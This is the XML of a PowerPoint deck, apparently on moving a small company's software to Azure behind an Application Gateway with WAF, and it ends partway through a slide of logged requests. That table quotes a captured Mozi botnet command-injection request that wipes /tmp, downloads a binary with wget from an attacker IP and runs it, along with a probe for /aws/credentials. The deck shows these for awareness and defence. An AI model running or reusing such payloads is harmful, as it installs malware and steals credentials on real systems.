        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3285621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6D54BA6-BE1D-42FA-3496-3B95CE0ED006}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key Takeaways</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Textplatzhalter 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E843DFDA-93E8-9C60-214C-E47798D16DF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Pros</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Inhaltsplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A92B2BF4-3FE8-D53C-E4AE-A4F43C24F5EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Neue Haas Grotesk Text Pro" panose="020B0504020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="+"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Very low infrastructure setup risks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Neue Haas Grotesk Text Pro" panose="020B0504020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="+"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Extendable infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Neue Haas Grotesk Text Pro" panose="020B0504020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="+"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Prepared security features in the cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Neue Haas Grotesk Text Pro" panose="020B0504020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="+"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>More than one possible way to set up your infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Textplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0B8D14F-C373-25D0-9945-198F44B687F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>Cons</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Inhaltsplatzhalter 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54F9DB48-1357-D1AB-8D54-73E4DE5A9C5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Not always simple to set up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Costs can be a reason to adjust the design of your system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Because of its popularity it becomes more attractive for attackers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10750492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81CC1FBA-66BE-437A-BCBC-ED8178A68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el 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCD7A1DB-FF6D-EBDB-BF41-4BE4BCCB81E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088136" y="3955718"/>
            <a:ext cx="5510372" cy="2339168"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="4000" dirty="0"/>
              <a:t>Last but not least</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-CH" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-CH" sz="2800" b="0" dirty="0"/>
              <a:t>- Disclaimer</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="4000" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 9" descr="Exclamation mark on a yellow background">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF0F21AC-578E-3A0B-2D14-B353B0235A22}"/>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a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="1"/>
            <a:ext cx="12191980" cy="3428999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E29BA74B-ECB4-4E0C-ADC9-17655FFE15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05226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Inhaltsplatzhalter 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0DE43D7-0AAD-57AF-2A9C-F97ABEC222F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6882449" y="3878825"/>
            <a:ext cx="4757101" cy="2430809"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>An Azure Application Gateway with enabled WAF configuration is a security enhancement, but it doesn’t make security reviews obsolete!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4187669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5" descr="Sparklers on glass jar">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA5FF713-1556-2FC1-42E6-B16E8A5D7F82}"/>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a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="12191979" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Titel 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1F3F12D-7DC7-FC16-F204-EED69F3C7BC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078992" y="5897460"/>
            <a:ext cx="9759584" cy="671119"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="0D0D0D">
              <a:alpha val="69804"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thank you for your attention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421022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2E55B7D-4025-AFF2-00C5-9CEC3174C757}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1091204" y="1091868"/>
            <a:ext cx="3785596" cy="2042160"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="4000"/>
              <a:t>Staring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="4000" dirty="0"/>
              <a:t> Point</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Connector 17">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5214964B-E118-AF30-7BCB-CC87E75F93E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804195" y="2295146"/>
            <a:ext cx="4359613" cy="3867115"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>We are a small to medium-sized company</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Our software is currently hosted on prem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>We want to make use of the advantages of a public cloud, like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Access to a broad variety of new infrastructure possibilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Paying for only what we use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Utilize the latest security features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>We want to follow the best practices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Grafik 5" descr="Mann lächelt und lehnt sich aus dem Essenswagen, mit Ellbogen auf der Theke, mit Würzformen auf einem Tablett und Menü auf Kreidetafel">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC2D3ABE-984E-5788-9486-5701AC616A8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524500" y="10"/>
            <a:ext cx="6667501" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62037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102D29-6499-2175-14C0-85A1A681FCF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="de-CH"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24074B94-4E01-2DCE-4EC6-8FAE17C3A4F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="de-CH"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Inhaltsplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4D096F5-7D06-61F5-BB45-131B3884CCD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2" cstate="email">
            <a:alphaModFix/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="16019" b="10692"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="12191979" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9311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F7842D-65AB-826B-7B12-090DCC084244}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The new system in the cloud</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Grafik 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A69FAB3-787E-762F-E9CB-F86D334727DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1988787" y="2384473"/>
            <a:ext cx="6973961" cy="3354740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129644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4C43B2-DB0A-708C-64E2-3FDC02E23F44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>list</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FA31851-23DF-8E7D-B190-5D206FF9F34B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1955800"/>
            <a:ext cx="10553700" cy="4330700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List of all requests send to our new site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Tabelle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{064F48A4-6909-DC74-C969-6AC72C099836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1586539485"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="2384473"/>
          <a:ext cx="11484865" cy="4028164"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{93296810-A885-4BE3-A3E7-6D5BEEA58F35}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5422392">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3792075424"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1838280">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="185416768"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2117390">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1674609412"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2106803">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3229534110"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="431524">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>Request</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>IP</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0" err="1"/>
                        <a:t>Whois</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-CH" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>Country</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4025400626"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="663803">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>shell?cd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>+/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>tmp;rm</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>+-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>rf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>+*;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>wget+http</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>://171.38.239.187:48934/Mozi.a;chmod+777+Mozi.a;/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>tmp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>/M</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>171.38.239.187</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1400" dirty="0"/>
                        <a:t>China Unicom </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
                        <a:t>GuangXi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1400" dirty="0"/>
                        <a:t> province network</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-CH" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>China</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2976320338"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="944880">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>aws</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>credentials</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>/.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
